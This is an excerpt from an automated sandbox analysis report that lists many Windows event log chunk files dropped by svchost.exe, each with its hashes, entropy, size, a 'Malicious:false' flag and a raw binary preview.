                                                                                                  SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.9223892466691472
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                                                                  MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                                                                  SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                                                                  SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                                                                  SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.838106263184782
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                                                                  MD5:A2D41740C1BAF781019F282E37288DDF
                                                                                                  SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                                                                  SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                                                                  SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.634418630947688
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                                                                  MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                                                                  SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                                                                  SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                                                                  SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.0646587531847893
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                                                                  MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                                                                  SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                                                                  SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                                                                  SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.4364303862010575
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                                                                  MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                                                                  SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                                                                  SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                                                                  SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.0631557320109892
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                                                                  MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                                                                  SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                                                                  SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                                                                  SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.4467272005363894
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                                                                  MD5:155681C222D825199B738E8DEC707DC8
                                                                                                  SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                                                                  SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                                                                  SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.156155224835584
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                                                                  MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                                                                  SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                                                                  SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                                                                  SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.9197999988543422
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                                                                  MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                                                                  SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                                                                  SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                                                                  SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                                                                                                  Category:dropped
                                                                                                  Size (bytes):76544
                                                                                                  Entropy (8bit):4.551581311383684
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:OLjpPv++M48PFVbUa+56NvbLjpPv++M48PFVbUa+56Nvc20sMY3Dp13/n/ydIxmt:cU
                                                                                                  MD5:EF2745B17B61B3C73CD29D0FC80FCE2E
                                                                                                  SHA1:A58D9CD758A53AA94FA43709E50A7C1F00922474
                                                                                                  SHA-256:5111A0D7F483A9ADD949B84FDADD215EEF1BA60C0AA47379F50D5CC674E75AB6
                                                                                                  SHA-512:72A4FB01A8C3CDDDEAC8857B8B99EFB0E550E3EE625292B587621D5E06041A7E3248C981BCA638A804A65E341269986DF799AEF13D6A27B256EB2A0128C9F004
                                                                                                  Malicious:false
                                                                                                  Preview:ElfFile.....................................................................................................................I..ElfChnk......................................(...*...\......................................................................."..................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):5.718426658668259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                                                                  MD5:8630011707C7BFBCECC0A9430637802E
                                                                                                  SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                                                                  SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                                                                  SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.9963080376858662
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                                                                  MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                                                                  SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                                                                  SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                                                                  SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.076996627399968
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                                                                  MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                                                                  SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                                                                  SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                                                                  SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.226573946735512
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:vvhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGj:vvZxGp9bf
                                                                                                  MD5:ECA76A209D26097AB9C9F253D10DAF56
                                                                                                  SHA1:1B3D9F4EB0BA45C9A0966F7451625D967D44040F
                                                                                                  SHA-256:0138BEF5AC969BB85E7C6A897E4709C02D845F91875E3132FDAD6D357BAB4122
                                                                                                  SHA-512:3C449A8FB23C1552A4DCD0C266DEE129E7E9A7FEAEC4DAE3E6EA17274C5BCE2E604C1ADB3F4F86F05156A5DE9E786BDA3C2344DD90C67246BE0B490CA3BBD906
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.T...............T...................P...h...2vo......................................................................n.........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a.................................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.801423310886069
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                                                                  MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                                                                  SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                                                                  SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                                                                  SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.996272372482282
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                                                                  MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                                                                  SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                                                                  SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                                                                  SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):68304
                                                                                                  Entropy (8bit):3.940348675757021
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:RtsxIdP4Vy+Fxl5LDKpkVLIcXhNMUekAYwkR1Nt/VWwvNt/MRYutDBjV8k+x7eUl:B4Vy+X6n2PButDBjV8k+x7PtHpoVW
                                                                                                  MD5:BB2558A4C418CE5B840710A215CA5B92
                                                                                                  SHA1:45191A1CF33687DE8D75C19CFE47036C2039F74D
                                                                                                  SHA-256:9079D323B649BDB79F5EE2D84A150BCCCA8189E5598DA64AD477A64D7E194D9C
                                                                                                  SHA-512:9D37A9B68FEA82B48D80B8FA2431130D0F311C93FA160241164B90AB602FC073C1026FD045C1BA29246B6FC5E9DDF1C111329B0E19E9A5EC7A2731059C0F6360
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.................O.......b............O..XQ...........................................................................LM ................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..h...]........3..............&...............................................................8.......P.....!..................3......&O....].'O............]....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L..........P.a.th...**..h...^........TQ..............&...............................................................8.......P.....!...............
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.742967935720958
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:ZkN2cTOsKbwj1/q4ogZCAJTi07NrjzDbRt:rcisAwjFogZCAJTi053R
                                                                                                  MD5:24FCFC592981BB43F5ADE09D83B4FA0C
                                                                                                  SHA1:5BFCE8052918DF521DB459330B24C0E593CB0B0E
                                                                                                  SHA-256:51E184535B72335572901288DFC15C1FFE746BF32A7D5E46A8964FE32383010F
                                                                                                  SHA-512:1987343E4046F63EB02EAF7FE830CDED59847C4B7967BCFD0BCC26CF85CEF123AD6FB620C82B1CD9B09FDADE0FE1D62F2588385703C7E25424067A17C6CDB5D5
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........................................p......y......................................................................C:................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.7590316238843728
                                                                                                  Encrypted:false
